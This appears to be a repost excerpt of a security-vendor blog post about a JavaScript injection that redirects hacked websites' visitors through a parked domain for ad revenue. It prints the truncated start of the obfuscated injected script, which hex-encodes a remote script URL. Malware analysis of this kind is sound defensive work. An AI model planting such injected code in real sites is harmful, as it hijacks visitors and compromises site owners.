Malicious Injection Redirects Traffic via Parked Domain

Black Hat Tactics Hacked Websites Labs Note Malware Redirects Website Malware Infections Website Security WordPress Security
Opsfolio Community
July 13, 2023, 3 months ago
40

During a recent investigation, our malware remediation team encountered a variant of a common malware injection that has been active since at least 2017. The malware was found hijacking the website’s traffic, redirecting visitors via a parked third-party domain to generate ad revenue. Investigating obfuscated JavaScript Our investigation revealed the following piece of obfuscated JavaScript which was found injected into random legitimate JavaScript files in the environment. In most cases, the injection typically looks something like this: var div_avada=document.createElement('script');div_avada.setAttribute("type","text/javascript");var all_avada=["\x2F\x2F\x68\x74\x6D\x6C\x35\x2E\x6F\x6E\x6C\x2F\x6E\x61\x76\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var...

Source: https://blog.sucuri.net/2023/07/malicious-injection-redirects-traffic-to-parked-domain.html

Malicious Injection Redirects Traffic via Parked Domain

Malicious Injection Redirects Traffic via Parked Domain

Subscribe To Our Newsletter!

Popular Posts

What A Cybersecurity Degree Teach You About Protecting Businesses Against Threats

Steps to creating a healthcare app

Cybersecurity Tips For Freelance Healthcare Workers

How to Create a Secure Healthcare Website?

How to keep your child safe from infections when you are not at home?

POPULAR Media

Ransomware Payouts Are On The Rise

Defense Against Socially Engineered Attacks

Address Ransomware With Multiple Layered Security

Hitrust – Streamlining the Compliance Process